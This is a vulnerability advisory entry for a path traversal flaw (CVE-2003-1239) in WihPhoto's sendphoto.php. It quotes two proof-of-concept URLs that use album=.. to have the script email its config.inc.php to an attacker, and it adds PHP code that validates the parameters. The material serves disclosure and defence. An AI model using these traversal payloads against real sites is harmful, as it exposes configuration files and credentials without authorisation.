WihPhoto sendphoto.php file disclosure vulnerability

Vulnerability ID: 1107230    Type: path traversal
Published: 2003-02-24    Updated: 2006-01-03
CVE: CVE-2003-1239    CNNVD ID: CNNVD-200312-320
Platform: PHP    CVSS score: 5.0
|Sources
https://www.exploit-db.com/exploits/22282
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-320
|Details
The sendphoto.php script in WihPhoto 0.86 contains a directory traversal vulnerability. A remote attacker can read arbitrary files by supplying a `..` sequence in the album parameter and naming the target file in the pic parameter.
|Exploit
source: http://www.securityfocus.com/bid/6929/info

A vulnerability has been reported for WihPhoto that may result in the disclosure of files to remote attackers.

The vulnerability exists due to inadequate verification of some URI parameters in the sendphoto.php script file.

An attacker can exploit this vulnerability and specify arbitrary files as the parameters to the variables. This will cause WihPhoto to send an email with the attacker-specified file as an attachment.

http://www.example.org/sendphoto.php?album=..&pic=config.inc.php
http://www.example.org/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1
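The root cause above is that the album and pic parameters are joined into a filesystem path without being checked. The following is an added example of how a sendphoto.php-style script can validate those two parameters; it is not WihPhoto's code, and the album root path, function name and accepted image extensions are assumptions.

```php
<?php
// Added example (not WihPhoto's code): resolve album/pic to a file that is
// guaranteed to sit under the album root, or refuse the request.
declare(strict_types=1);

/**
 * Return the canonical path of $pic inside $album under $albumRoot, or null
 * when either parameter tries to leave the album tree (album=.. / pic=config.inc.php)
 * or names something other than an image.
 */
function resolvePhotoPath(string $albumRoot, string $album, string $pic): ?string
{
    // 1. Each parameter must be a single path component: no separators,
    //    no NUL bytes, and no "." / ".." segments.
    foreach ([$album, $pic] as $part) {
        if ($part === '' || $part === '.' || $part === '..'
            || preg_match('#[/\\\\\x00]#', $part) === 1) {
            return null;
        }
    }

    // 2. Only image files are ever attached, so config.inc.php and other
    //    application files are excluded by extension as well.
    if (preg_match('/\.(jpe?g|gif|png)$/i', $pic) !== 1) {
        return null;
    }

    // 3. Canonicalise and confirm the result is still below the album root.
    //    realpath() also returns false for files that do not exist.
    $root = realpath($albumRoot);
    $full = realpath($albumRoot . DIRECTORY_SEPARATOR . $album
                     . DIRECTORY_SEPARATOR . $pic);
    if ($root === false || $full === false) {
        return null;
    }
    if (strncmp($full, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Usage with the parameters from the advisory: rejected at step 1, so the
// mail-sending code never sees a path outside the album root.
$albumRoot = '/var/www/photos';   // assumed location of the album directory
$path = resolvePhotoPath($albumRoot, $_GET['album'] ?? '', $_GET['pic'] ?? '');
if ($path === null) {
    http_response_code(400);
    exit('invalid album or picture');
}
```

Step 1 alone blocks the traversal shown in the advisory; steps 2 and 3 are defence in depth against encodings or symlinks that a single check might miss.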
|References

BID 6929: http://www.securityfocus.com/bid/6929
BUGTRAQ 20030223 WihPhoto (PHP): http://www.securityfocus.com/archive/1/312966
VULNWATCH 20030223 WihPhoto (PHP): http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0092.html
XF wihphoto-sendphoto-file-disclosure (11429): http://www.iss.net/security_center/static/11429.php